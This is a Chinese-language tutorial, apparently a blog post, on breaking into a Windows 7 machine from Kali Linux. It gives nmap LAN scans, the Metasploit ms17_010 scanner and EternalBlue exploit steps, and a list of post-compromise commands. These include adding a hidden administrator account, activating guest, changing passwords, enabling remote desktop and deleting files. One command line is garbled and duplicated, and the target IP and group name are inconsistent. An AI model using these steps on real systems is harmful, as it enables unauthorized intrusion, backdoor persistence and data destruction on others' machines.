kali入侵win7

前提说明

1.在同个局域网内
2.准备纯净系统的win7系统电脑一台
3.准备kali系统一台
4.我的操作均是在虚拟机上完成,可能在物理机上效果会有所不同。

步骤

第一步: 扫描局域网内存活的主机:

nmap -sP 192.168.1.0/24 (扫描较快)
也可以直接用这条命令来扫描:
nmap -sS -sV -Pn 192.168.1.0/24 (扫描较慢)
nmap还有很多扫描用法,请自行查询。

第二步:扫描要攻击的主机:

nmap -sS -sV -Pn 192.168.1.111(例如目标主机是192.168.1.111)

第三步:Kali终端输入msfconsole 或者手动点击软件图标

第四步:先使用use auxiliary/scanner/smb/smb_ms17_010

利用ms17_010这个漏洞入侵
紧接着输入show options这个模块进行漏洞的分析,看看这个445端口是否能被入侵。

第五步:使用攻击模块:

use exploit/windows/smb/ms17_010_eternalblue

输入show targets查看这个模块适用于哪些系统的主机

第六步:设置RHOST,即要攻击的主机ip:

set RHOST 192.168.0.111

第七步:执行run

如果电脑存在上面的那个漏洞的话,这一步就可以进去了
如果等了一会还没显示进去的话,就按下回车键。

备注:进去之后会看到乱码,因为cmd上的编码使用的是936,通过 chcp命令改变代码页,UTF-8的代码页为65001 。要改回linux的UTF-8编码:chcp 65001

MS-DOS为以下国家和语言提供字符集:
  代码页描述
  1258 越南语
  1257 波罗的语
  1256 阿拉伯语
  1255 希伯来语
  1254 土耳其语
  1253 希腊语
  1252 拉丁 1 字符 (ANSI)
  1251 西里尔语
  1250 中欧语言
  950 繁体中文
  949 朝鲜语
  936 简体中文(默认)
  932 日语
  874 泰国语
  850 多语种 (MS-DOS Latin1)
  437 MS-DOS 美国英语

还有一个解决方法,如果想显示中文的话,就将kali终端的编码改为“简体中文-GBK”

第八步:执行想要操作的指令

删除文件夹:rmdir 目标文件夹
删除文件:del
创建文件夹:md 文件夹
查看目标的磁盘信息:wmic logicaldisk
查看系统信息:systeminfo
创建一个用户:net user test 123456 /add
将创建的test用户赋予管理员权限:net localgroup administrator test /add
查看有哪些用户:net user
查看账户的属性:net user test
立刻关机:shutdown /s/f #会提示没有权限
net user guest /active:yes 激活guest用户
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -n 查看端口的网络连接情况,常用netstat -an
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net user admin /active:no 将用户admin禁用
net user admin /active:yes 将用户admin激活
tive:no 将用户admin禁用
net user admin /active:yes 将用户admin激活
net start termservice termservice 是远程桌面服务
net user 用户名 复杂密码 /add 添加用户
net localgroup administrators 用户名 /add 将用户加入管理员组